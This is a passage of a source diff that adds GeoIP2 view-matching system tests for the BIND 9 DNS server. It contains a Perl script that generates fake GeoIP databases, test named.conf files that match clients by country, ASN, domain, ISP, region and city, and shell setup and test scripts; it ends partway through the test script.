for ( + ['GeoIP2-City'], + ['GeoIP2-Country'], + ['GeoIP2-Domain'], + ['GeoIP2-ISP'], + ['GeoLite2-ASN'], + ); +} + +sub _universal_map_key_type_callback { + my $map = { + + # languages + de => 'utf8_string', + en => 'utf8_string', + es => 'utf8_string', + fr => 'utf8_string', + ja => 'utf8_string', + 'pt-BR' => 'utf8_string', + ru => 'utf8_string', + 'zh-CN' => 'utf8_string', + + # production + accuracy_radius => 'uint16', + autonomous_system_number => 'uint32', + autonomous_system_organization => 'utf8_string', + average_income => 'uint32', + city => 'map', + code => 'utf8_string', + confidence => 'uint16', + connection_type => 'utf8_string', + continent => 'map', + country => 'map', + domain => 'utf8_string', + geoname_id => 'uint32', + ipv4_24 => 'uint32', + ipv4_32 => 'uint32', + ipv6_32 => 'uint32', + ipv6_48 => 'uint32', + ipv6_64 => 'uint32', + is_anonymous => 'boolean', + is_anonymous_proxy => 'boolean', + is_anonymous_vpn => 'boolean', + is_hosting_provider => 'boolean', + is_in_european_union => 'boolean', + is_legitimate_proxy => 'boolean', + is_public_proxy => 'boolean', + is_satellite_provider => 'boolean', + is_tor_exit_node => 'boolean', + iso_code => 'utf8_string', + isp => 'utf8_string', + latitude => 'double', + location => 'map', + longitude => 'double', + metro_code => 'uint16', + names => 'map', + organization => 'utf8_string', + population_density => 'uint32', + postal => 'map', + registered_country => 'map', + represented_country => 'map', + subdivisions => [ 'array', 'map' ], + time_zone => 'utf8_string', + traits => 'map', + traits => 'map', + type => 'utf8_string', + user_type => 'utf8_string', + + # for testing only + foo => 'utf8_string', + bar => 'utf8_string', + buzz => 'utf8_string', + our_value => 'utf8_string', + }; + + my $callback = sub { + my $key = shift; + + return $map->{$key} || die <<"ERROR"; +Unknown tree key '$key'. + +The universal_map_key_type_callback doesn't know what type to use for the passed +key. If you are adding a new key that will be used in a frozen tree / mmdb then +you should update the mapping in both our internal code and here. +ERROR + }; + + return $callback; +} + +sub _write_geoip2_db { + my $type = shift; + my $populate_all_networks_with_data = shift; + my $description = shift; + + my $writer = MaxMind::DB::Writer::Tree->new( + ip_version => 6, + record_size => 28, + ip_version => 6, + database_type => $type, + languages => [ 'en', $type eq 'GeoIP2-City' ? ('zh') : () ], + description => { + en => ( $type =~ s/-/ /gr ) + . " $description Database (fake GeoIP2 data, for example purposes only)", + $type eq 'GeoIP2-City' ? ( zh => 'å°åž‹æ•°æ®åº“' ) : (), + }, + alias_ipv6_to_ipv4 => 1, + map_key_type_callback => _universal_map_key_type_callback(), + remove_reserved_networks => 0, + ); + + _populate_all_networks( $writer, $populate_all_networks_with_data ) + if $populate_all_networks_with_data; + + my $value = shift; + my $nodes + = decode_json( read_binary("$Dir/$type.json") ); + + for my $node (@$nodes) { + for my $network ( keys %$node ) { + $writer->insert_network( + Net::Works::Network->new_from_string( string => $network ), + $node->{$network} + ); + } + } + + open my $output_fh, '>', "$Dir/$type.mmdb"; + $writer->write_tree($output_fh); + close $output_fh; + + return; +} + +sub _populate_all_networks { + my $writer = shift; + my $data = shift; + + my $max_uint128 = uint128(0) - 1; + my @networks = Net::Works::Network->range_as_subnets( + Net::Works::Address->new_from_integer( + integer => 0, + version => 6, + ), + Net::Works::Address->new_from_integer( + integer => $max_uint128, + version => 6, + ), + ); + + for my $network (@networks) { + $writer->insert_network( $network => $data ); + } +} + +main(); diff --git a/bin/tests/system/geoip2/ns2/example.db.in b/bin/tests/system/geoip2/ns2/example.db.in new file mode 100644 index 0000000..fa3874c --- /dev/null +++ b/bin/tests/system/geoip2/ns2/example.db.in @@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 +ns2 A 10.53.0.2 diff --git a/bin/tests/system/geoip2/ns2/named1.conf.in b/bin/tests/system/geoip2/ns2/named1.conf.in new file mode 100644 index 0000000..8c5784a --- /dev/null +++ b/bin/tests/system/geoip2/ns2/named1.conf.in @@ -0,0 +1,108 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip db country country AU; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { geoip db country country US; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { geoip db country country GB; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { geoip db country country CA; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { geoip db country country CL; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { geoip db country country DE; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { geoip db country country EH; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view other { + match-clients { geoip db country country O1; }; + zone "example" { + type primary; + file "exampleother.db"; + }; +}; + +view none { + match-clients { any; }; + zone "example" { + type primary; + file "example.db.in"; + }; +}; diff --git a/bin/tests/system/geoip2/ns2/named10.conf.in b/bin/tests/system/geoip2/ns2/named10.conf.in new file mode 100644 index 0000000..da3f9cd --- /dev/null +++ b/bin/tests/system/geoip2/ns2/named10.conf.in @@ -0,0 +1,100 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip asnum 100001; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { geoip asnum 100002; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { geoip asnum 100003; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { geoip asnum 100004; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { geoip asnum 100005; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { geoip asnum 100006; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { geoip asnum 100007; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view none { + match-clients { any; }; + zone "example" { + type primary; + file "example.db.in"; + }; +}; diff --git a/bin/tests/system/geoip2/ns2/named11.conf.in b/bin/tests/system/geoip2/ns2/named11.conf.in new file mode 100644 index 0000000..578a484 --- /dev/null +++ b/bin/tests/system/geoip2/ns2/named11.conf.in @@ -0,0 +1,100 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip domain one.de; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { geoip domain two.com; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { geoip domain three.com; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { geoip domain four.edu; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { geoip domain five.es; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { geoip domain six.it; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { geoip domain seven.org; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view none { + match-clients { any; }; + zone "example" { + type primary; + file "example.db.in"; + }; +}; diff --git a/bin/tests/system/geoip2/ns2/named12.conf.in b/bin/tests/system/geoip2/ns2/named12.conf.in new file mode 100644 index 0000000..9c90c79 --- /dev/null +++ b/bin/tests/system/geoip2/ns2/named12.conf.in @@ -0,0 +1,41 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +acl blocking { + geoip db country country AU; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; + blackhole { blocking; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; diff --git a/bin/tests/system/geoip2/ns2/named2.conf.in b/bin/tests/system/geoip2/ns2/named2.conf.in new file mode 100644 index 0000000..5ca5fcf --- /dev/null +++ b/bin/tests/system/geoip2/ns2/named2.conf.in @@ -0,0 +1,108 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 127.0.0.1; 10.53.0.2; }; + listen-on-v6 { ::1; fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +acl gAU { geoip db country country AU; }; +acl gUS { geoip db country country US; }; +acl gGB { geoip db country country GB; }; +acl gCA { geoip db country country CA; }; +acl gCL { geoip db country country CL; }; +acl gDE { geoip db country country DE; }; +acl gEH { geoip db country country EH; }; + +view one { + match-clients { gAU; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { gUS; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { gGB; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { gCA; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { gCL; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { gDE; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { gEH; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view none { + match-clients { any; }; + zone "example" { + type primary; + file "examplebogus.db"; + }; +}; diff --git a/bin/tests/system/geoip2/ns2/named3.conf.in b/bin/tests/system/geoip2/ns2/named3.conf.in new file mode 100644 index 0000000..295122a --- /dev/null +++ b/bin/tests/system/geoip2/ns2/named3.conf.in @@ -0,0 +1,100 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip db country country Australia; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { geoip db country country "United States"; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { geoip db country country "United Kingdom"; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { geoip db country country Canada; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { geoip db country country Chile; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { geoip db country country Germany; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { geoip db country country "Western Sahara"; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view none { + match-clients { any; }; + zone "example" { + type primary; + file "example.db.in"; + }; +}; diff --git a/bin/tests/system/geoip2/ns2/named4.conf.in b/bin/tests/system/geoip2/ns2/named4.conf.in new file mode 100644 index 0000000..efdcaeb --- /dev/null +++ b/bin/tests/system/geoip2/ns2/named4.conf.in @@ -0,0 +1,84 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip db country continent OC; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { geoip db country continent NA; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { geoip db country continent EU; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view five { + match-clients { geoip db country continent SA; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view seven { + match-clients { geoip db country continent AF; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view none { + match-clients { any; }; + zone "example" { + type primary; + file "example.db.in"; + }; +}; diff --git a/bin/tests/system/geoip2/ns2/named5.conf.in b/bin/tests/system/geoip2/ns2/named5.conf.in new file mode 100644 index 0000000..675dc18 --- /dev/null +++ b/bin/tests/system/geoip2/ns2/named5.conf.in @@ -0,0 +1,92 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip region CA; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view three { + match-clients { geoip region OK; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { geoip region VA; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { geoip region GA; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { geoip region CO; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { geoip region AK; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view none { + match-clients { any; }; + zone "example" { + type primary; + file "example.db.in"; + }; +}; diff --git a/bin/tests/system/geoip2/ns2/named6.conf.in b/bin/tests/system/geoip2/ns2/named6.conf.in new file mode 100644 index 0000000..456462f --- /dev/null +++ b/bin/tests/system/geoip2/ns2/named6.conf.in @@ -0,0 +1,100 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip city "Redwood City"; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { geoip city "Santa Cruz"; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { geoip city "Oklahoma City"; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { geoip city "Ashland"; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { geoip city "Atlanta"; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { geoip city "Morrison"; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { geoip city "Ketchikan"; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view none { + match-clients { any; }; + zone "example" { + type primary; + file "example.db.in"; + }; +}; diff --git a/bin/tests/system/geoip2/ns2/named7.conf.in b/bin/tests/system/geoip2/ns2/named7.conf.in new file mode 100644 index 0000000..b248e02 --- /dev/null +++ b/bin/tests/system/geoip2/ns2/named7.conf.in @@ -0,0 +1,100 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip isp "One Systems, Inc."; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { geoip isp "Two Technology Ltd."; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { geoip isp "Three Network Labs"; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { geoip isp "Four University"; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { geoip isp "Five Telecom"; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { geoip isp "Six Company"; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { geoip isp "Seven Communications"; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view none { + match-clients { any; }; + zone "example" { + type primary; + file "example.db.in"; + }; +}; diff --git a/bin/tests/system/geoip2/ns2/named8.conf.in b/bin/tests/system/geoip2/ns2/named8.conf.in new file mode 100644 index 0000000..26660b5 --- /dev/null +++ b/bin/tests/system/geoip2/ns2/named8.conf.in @@ -0,0 +1,100 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip org "One Systems, Inc."; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { geoip org "Two Technology Ltd."; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { geoip org "Three Network Labs"; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { geoip org "Four University"; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { geoip org "Five Telecom"; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { geoip org "Six Company"; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { geoip org "Seven Communications"; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view none { + match-clients { any; }; + zone "example" { + type primary; + file "example.db.in"; + }; +}; diff --git a/bin/tests/system/geoip2/ns2/named9.conf.in b/bin/tests/system/geoip2/ns2/named9.conf.in new file mode 100644 index 0000000..392879b --- /dev/null +++ b/bin/tests/system/geoip2/ns2/named9.conf.in @@ -0,0 +1,100 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +// NS2 + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion no; + dnssec-validation no; + geoip-directory "../data"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +view one { + match-clients { geoip asnum "AS100001"; }; + zone "example" { + type primary; + file "example1.db"; + }; +}; + +view two { + match-clients { geoip asnum "AS100002"; }; + zone "example" { + type primary; + file "example2.db"; + }; +}; + +view three { + match-clients { geoip asnum "AS100003"; }; + zone "example" { + type primary; + file "example3.db"; + }; +}; + +view four { + match-clients { geoip asnum "AS100004"; }; + zone "example" { + type primary; + file "example4.db"; + }; +}; + +view five { + match-clients { geoip asnum "AS100005"; }; + zone "example" { + type primary; + file "example5.db"; + }; +}; + +view six { + match-clients { geoip asnum "AS100006"; }; + zone "example" { + type primary; + file "example6.db"; + }; +}; + +view seven { + match-clients { geoip asnum "AS100007"; }; + zone "example" { + type primary; + file "example7.db"; + }; +}; + +view none { + match-clients { any; }; + zone "example" { + type primary; + file "example.db.in"; + }; +}; diff --git a/bin/tests/system/geoip2/prereq.sh b/bin/tests/system/geoip2/prereq.sh new file mode 100644 index 0000000..8d8528f --- /dev/null +++ b/bin/tests/system/geoip2/prereq.sh @@ -0,0 +1,21 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$FEATURETEST --have-geoip2 || { + echo_i "This test requires GeoIP support." >&2 + exit 255 +} +exit 0 diff --git a/bin/tests/system/geoip2/setup.sh b/bin/tests/system/geoip2/setup.sh new file mode 100644 index 0000000..22d3c46 --- /dev/null +++ b/bin/tests/system/geoip2/setup.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns2/named1.conf.in ns2/named.conf + +for i in 1 2 3 4 5 6 7 other bogus; do + cp ns2/example.db.in ns2/example${i}.db + echo "@ IN TXT \"$i\"" >> ns2/example$i.db +done diff --git a/bin/tests/system/geoip2/tests.sh b/bin/tests/system/geoip2/tests.sh new file mode 100644 index 0000000..77b6f93 --- /dev/null +++ b/bin/tests/system/geoip2/tests.sh @@ -0,0 +1,489 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=0 + +rm -f dig.out.* + +DIGOPTS="+tcp +short -p ${PORT} @10.53.0.2" +DIGOPTS6="+tcp +short -p ${PORT} @fd92:7065:b8e:ffff::2 -6" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +for conf in conf/good*.conf +do + n=`expr $n + 1` + echo_i "checking that $conf is accepted ($n)" + ret=0 + $CHECKCONF "$conf" || ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +for conf in conf/bad*.conf +do + n=`expr $n + 1` + echo_i "checking that $conf is rejected ($n)" + ret=0 + $CHECKCONF "$conf" >/dev/null && ret=1 + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +n=`expr $n + 1` +echo_i "checking Country database by code using IPv4 ($n)" +ret=0 +lret=0 +for i in 1 2 3 4 5 6 7; do + $DIG $DIGOPTS txt example -b 10.53.0.$i > dig.out.ns2.test$n.$i || lret=1 + j=`cat dig.out.ns2.test$n.$i | tr -d '"'` + [ "$i" = "$j" ] || lret=1 + [ $lret -eq 1 ] && break +done +[ $lret -eq 1 ] && ret=1 +[ $ret -eq 0 ] || echo_i "failed" +status=`expr $status + $ret` + +if testsock6 fd92:7065:b8e:ffff::3 +then + n=`expr $n + 1` + echo_i "checking Country database by code using IPv6 ($n)" + ret=0 + lret=0 + for i in 1 2 3 4 5 6 7; do + $DIG 